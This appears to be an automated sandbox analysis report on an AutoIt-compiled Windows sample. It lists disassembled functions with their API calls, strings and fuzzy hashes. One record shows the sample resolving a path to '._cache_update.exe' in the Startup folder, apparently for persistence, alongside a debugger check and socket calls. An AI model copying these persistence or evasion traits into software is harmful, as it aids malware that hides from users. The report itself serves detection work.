                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscmp
                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                          • API String ID: 856254489-3771769585
                                                                                                                                                          • Opcode ID: 6a5022402aab31c6dd039a82d2c3aa524771da780a0aba912e0b202b2825dde7
                                                                                                                                                          • Instruction ID: 77a8e55daf793bcce60185a9b3b690dbafe6b5f413f5602d4a9de94fe896dd15
                                                                                                                                                          • Opcode Fuzzy Hash: 6a5022402aab31c6dd039a82d2c3aa524771da780a0aba912e0b202b2825dde7
                                                                                                                                                          • Instruction Fuzzy Hash: 4A11A335700314DBCB08EB54E991EA9B3B5AF98714B14C059F609AF391EB71ED818BA4
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00193CF1
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                            • Part of subcall function 00123A67: SHGetMalloc.SHELL32(00123C31), ref: 00123A7D
                                                                                                                                                            • Part of subcall function 00123A67: SHGetDesktopFolder.SHELL32(?), ref: 00123A8F
                                                                                                                                                            • Part of subcall function 00123A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00123AD2
                                                                                                                                                            • Part of subcall function 00123B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,001E22E8,?), ref: 00123B65
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                                          • String ID: X
                                                                                                                                                          • API String ID: 2727075218-3081909835
                                                                                                                                                          • Opcode ID: 94276e200ecd59a2be5ce694bf5e5b5fe5ac1faafa57219471e9d1c869f870d4
                                                                                                                                                          • Instruction ID: 140796ac4454f452e1931499da357a4a68239d2bfa433d854d92641b486a38a4
                                                                                                                                                          • Opcode Fuzzy Hash: 94276e200ecd59a2be5ce694bf5e5b5fe5ac1faafa57219471e9d1c869f870d4
                                                                                                                                                          • Instruction Fuzzy Hash: 2F11CA71A00298BBCF05DFD4E8056DE7BF9AF55704F00400AE521BB341DBB84A59CBA1
                                                                                                                                                          Strings
                                                                                                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 001934AA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                          • API String ID: 1029625771-2684727018
                                                                                                                                                          • Opcode ID: 3660f4cc8f077463f166af4561c4614f094a1c3fdd2079ceec3c65f348536674
                                                                                                                                                          • Instruction ID: a98f59092d6c9d01c23ce6e5aa46dd8307c1ad3f1a38d45ab1106fd0032c527f
                                                                                                                                                          • Opcode Fuzzy Hash: 3660f4cc8f077463f166af4561c4614f094a1c3fdd2079ceec3c65f348536674
                                                                                                                                                          • Instruction Fuzzy Hash: 4EF06871D0421DAECF15FFB0EC518FFB7B8AA20310B118526F83592081EB389B19CB21
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6c6fe722f034e30692c80e3a509a5e314d1c7e5602d3e4a6df0d45671e02a012
                                                                                                                                                          • Instruction ID: 0a2c6091ccf508627bddd34cf786f83bee87aeb4f741a7a3c19b06d203b4b07f
                                                                                                                                                          • Opcode Fuzzy Hash: 6c6fe722f034e30692c80e3a509a5e314d1c7e5602d3e4a6df0d45671e02a012
                                                                                                                                                          • Instruction Fuzzy Hash: 3151C4316043019FCB14EF68D491BAE73E5AF98314F14856DF99A8B292DB30ED45CBA1
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00178074
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0017807A
                                                                                                                                                            • Part of subcall function 00176B19: GetWindowRect.USER32(?,?), ref: 00176B2C
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$CursorForegroundRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1066937146-0
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(00000000), ref: 0019DB31
                                                                                                                                                          • IsWindow.USER32(00000000), ref: 0019DB6B
                                                                                                                                                            • Part of subcall function 00121F04: GetForegroundWindow.USER32 ref: 00121FBE
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Foreground
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 62970417-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00121952
                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0015E344
                                                                                                                                                          • _strlen.LIBCMT ref: 0015E34F
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Timeout_strlen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2777139624-0
                                                                                                                                                          APIs
                                                                                                                                                          • 74E4C8D0.UXTHEME ref: 001236E6
                                                                                                                                                            • Part of subcall function 00142025: __lock.LIBCMT ref: 0014202B
                                                                                                                                                            • Part of subcall function 001232DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001232F6
                                                                                                                                                            • Part of subcall function 001232DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0012330B
                                                                                                                                                            • Part of subcall function 0012374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0012376D
                                                                                                                                                            • Part of subcall function 0012374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0012377F
                                                                                                                                                            • Part of subcall function 0012374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,001E1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,001E1124,?,?), ref: 001237EE
                                                                                                                                                            • Part of subcall function 0012374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00123860
                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00123726
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3809921791-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00124C2B,?,?,?,?,0012BE63), ref: 00124BB6
                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00124C2B,?,?,?,?,0012BE63), ref: 00194972
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          APIs
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016AEA5,?,?,00000000,00000008), ref: 0013F282
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016AEA5,?,?,00000000,00000008), ref: 0013F2A6
                                                                                                                                                            • Part of subcall function 0013F2D0: _memmove.LIBCMT ref: 0013F307
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3033907384-0
                                                                                                                                                          APIs
                                                                                                                                                          • ___lock_fhandle.LIBCMT ref: 0014F7D9
                                                                                                                                                          • __close_nolock.LIBCMT ref: 0014F7F2
                                                                                                                                                            • Part of subcall function 0014886A: __getptd_noexit.LIBCMT ref: 0014886A
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1046115767-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0012352A
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • _wcscat.LIBCMT ref: 001966C0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 257928180-0
                                                                                                                                                          APIs
                                                                                                                                                          • send.WS2_32(00000000,?,00000000,00000000), ref: 00179534
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00179557
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastsend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1802528911-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • __lock_file.LIBCMT ref: 001442B9
                                                                                                                                                            • Part of subcall function 00145A9F: __lock.LIBCMT ref: 00145AC2
                                                                                                                                                          • __fclose_nolock.LIBCMT ref: 001442C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2800547568-0
                                                                                                                                                          • Opcode ID: b5fbc1507a12ccf4820a9ff919d712214361a6b0f17ff71177e703afe735d851
                                                                                                                                                          • Instruction ID: 71a9b3d71e29fab41eee48d643f46c60deca962a1c04451ca45bc7e458d886be
                                                                                                                                                          • Opcode Fuzzy Hash: b5fbc1507a12ccf4820a9ff919d712214361a6b0f17ff71177e703afe735d851
                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0BE71801B059BD720BF759802BAE7BE06F60335F668609F824AB1E2CBBC89019B51
                                                                                                                                                          APIs
                                                                                                                                                          • timeGetTime.WINMM ref: 0013F57A
                                                                                                                                                            • Part of subcall function 0012E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E279
                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 001975D3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePeekSleepTimetime
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1792118007-0
                                                                                                                                                          • Opcode ID: bbe6daf483a451339f1ef9e00db1186d409a69bf76e0513c7aa873b5b1bdd829
                                                                                                                                                          • Instruction ID: 74c970b9ed469e93b4749bb90ce72a3fe853b5cf56521adb70b0befd7e78d796
                                                                                                                                                          • Opcode Fuzzy Hash: bbe6daf483a451339f1ef9e00db1186d409a69bf76e0513c7aa873b5b1bdd829
                                                                                                                                                          • Instruction Fuzzy Hash: 00F08C712007289FD354EFA9E405B9ABBE8AF69320F01002AF81AC7651EB70B850CBD0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                          • Instruction ID: 4bc82de525ead7a545775cac192f23bcc919aa8ef353ce464127be00a9f92083
                                                                                                                                                          • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                          • Instruction Fuzzy Hash: 3361BFB5A006069FDB14DF64C880ABAF7F4FF18310F108269E91A87691E770FD95CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ae39c585d72072590cf72a12dc84f3eb5d64be112c82f043aacf3edefd8dc81d
                                                                                                                                                          • Instruction ID: d61314959b6ca68802359d03545ecd2ec4f1cd0b6a9bfd29193689e681b2f251
                                                                                                                                                          • Opcode Fuzzy Hash: ae39c585d72072590cf72a12dc84f3eb5d64be112c82f043aacf3edefd8dc81d
                                                                                                                                                          • Instruction Fuzzy Hash: BA51B335700214AFCF08EFA8D991EAE77EAAF59314F144069F9069B392DB30ED15DB90
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                          • Instruction ID: 0fcb443ac5a9f6a6e9807b8662fdf94af7573d039ff21be7da62daf211bbf5e9
                                                                                                                                                          • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                          • Instruction Fuzzy Hash: D341BEB9204612CFC728DF19E491922F7F0FF88360714C42EE99A8B7A1D730E862CB50
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00124F8F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                          • Opcode ID: 1ac381bb8fe4d5540a699e64d2e616911cc11135de02bcd45967d1870393c23f
                                                                                                                                                          • Instruction ID: 7166c197a93c0f09c183f442b8748cf41fd7444c54f1c227aacb2a6cb963bf9f
                                                                                                                                                          • Opcode Fuzzy Hash: 1ac381bb8fe4d5540a699e64d2e616911cc11135de02bcd45967d1870393c23f
                                                                                                                                                          • Instruction Fuzzy Hash: 95316F31A00A25AFCB08CF6CE580AADB7B5FF88314F158629E81993714D770BDA0CBD0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: select
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1274211008-0
                                                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                          • Instruction ID: 5a15008ee3f4d4221014bd4f6b39705334411e31b67e9595c6a145f39f8b4a0b
                                                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                          • Instruction Fuzzy Hash: AC31D570A00106ABC718DF58D480B69FBA5FB59318F6582A9E449DB255D731EDC2CBC0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                          • Opcode ID: 7800dcda725ebd1b4d262c72c8c3cdded45043c528f542794d70887c01d1486d
                                                                                                                                                          • Instruction ID: 98ae1c60b4c6e78c68c386605e469cbec4efede71e9575021ca27a48676ddb29
                                                                                                                                                          • Opcode Fuzzy Hash: 7800dcda725ebd1b4d262c72c8c3cdded45043c528f542794d70887c01d1486d
                                                                                                                                                          • Instruction Fuzzy Hash: 95417C70504651CFEB25CF18C494B1ABBE1BF49308F1985ACE99A4B362C332EC85CF92
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: e53d8e70379345ffc4f6d8c45a722669a6bf0257b5181cdb0f1daada650a30bc
                                                                                                                                                          • Instruction ID: 9722e238f828c5bcf17fa9010066c613b9487e022f99028d7c6898a6342650b4
                                                                                                                                                          • Opcode Fuzzy Hash: e53d8e70379345ffc4f6d8c45a722669a6bf0257b5181cdb0f1daada650a30bc
                                                                                                                                                          • Instruction Fuzzy Hash: 7A21E470A0060CEBDF189F91FC41AB97BF8FB65340F22846EE486D6010EB3095E2C755
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                          • Instruction ID: dbd0bad93db297ea0af569c6e0d5b81ccf8a8d80997c44841727239f640ba674
                                                                                                                                                          • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                          • Instruction Fuzzy Hash: 62114C76600601DFD724DF28E481916B7E9FF48314B20842EE98ACB661E732E851CB50
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00123F90
                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001234E2,?,00000001), ref: 00123FCD
                                                                                                                                                            • Part of subcall function 00123E78: FreeLibrary.KERNEL32(00000000), ref: 00123EAB
                                                                                                                                                            • Part of subcall function 00124010: _memmove.LIBCMT ref: 0012405A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$Free$Load_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3640140200-0
                                                                                                                                                          • Opcode ID: 5d350c537bdc56ac63374fff5f719bc995df409f650684c70c3fb82b04c41875
                                                                                                                                                          • Instruction ID: 68e5d7f5c4bce0f6fc120e41e60d45b3f48b636698656b8db58afa952971dc81
                                                                                                                                                          • Opcode Fuzzy Hash: 5d350c537bdc56ac63374fff5f719bc995df409f650684c70c3fb82b04c41875
                                                                                                                                                          • Instruction Fuzzy Hash: EC11E332600225ABCF15AF64FC02FAD77A99F60700F10882DF552E70C1DB74AA649B54
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                          • Opcode ID: 44fb33e2bdf8d01eabe5d6bc010cd30e2f1a08699ad2290780ede405ee42a364
                                                                                                                                                          • Instruction ID: d1febfdba76b4c60abb04bbc6c8c60a1b8d53977e93a42fa2c6f4b0c6cc0b5d7
                                                                                                                                                          • Opcode Fuzzy Hash: 44fb33e2bdf8d01eabe5d6bc010cd30e2f1a08699ad2290780ede405ee42a364
                                                                                                                                                          • Instruction Fuzzy Hash: 53214870508601CFEB25DF29D494B1ABBE1BF89308F15496CFA9A4B632C331E885CF52
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          APIs
                                                                                                                                                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00124E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00124CF7
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                          APIs
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          APIs
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          APIs
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00125A39,?,?,?,-00000003,00000000,00000000), ref: 0012514E
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3964851224-0
                                                                                                                                                          APIs
                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 001795C9
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Startup
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                          • Opcode ID: aa1ed3036c55d2289efb4fc2941190d10357ded2c3c5693ced27390027b60669
                                                                                                                                                          • Instruction ID: c4731415f49d197bf37fd2d7b224991c9823482ee79b11bb23342efa87489733
                                                                                                                                                          • Opcode Fuzzy Hash: aa1ed3036c55d2289efb4fc2941190d10357ded2c3c5693ced27390027b60669
                                                                                                                                                          • Instruction Fuzzy Hash: DCE0E5336043146BC310EA64EC05AABB799BF85720F04871ABDA4872C1DB30D814C3C1
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,001234E2,?,00000001), ref: 00123E6D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                          • Opcode ID: ad8b36a90c1b56d7d8154158506f3bd975d15dd7d426aef68f85200c7c18c7e7
                                                                                                                                                          • Instruction ID: 9ba63d0a10d098ed78719e84f30982a26508989ef1603c6f6ed4171a869a2f3c
                                                                                                                                                          • Opcode Fuzzy Hash: ad8b36a90c1b56d7d8154158506f3bd975d15dd7d426aef68f85200c7c18c7e7
                                                                                                                                                          • Instruction Fuzzy Hash: C9F03971101761CFCB389F64F490816BBF0EF147153268A3EE1E682A21D7359998DF00
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00167A11
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FolderPath_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3334745507-0
                                                                                                                                                          • Opcode ID: 3ee0fb3cdbe95a278269b4cbd41aea159fd2b4f831d8713cc621bb7894356947
                                                                                                                                                          • Instruction ID: 395666f59b270a0b6d21bf3d1baeccf8a638b7b02a2ec99e08e1c25c2dc4e4ed
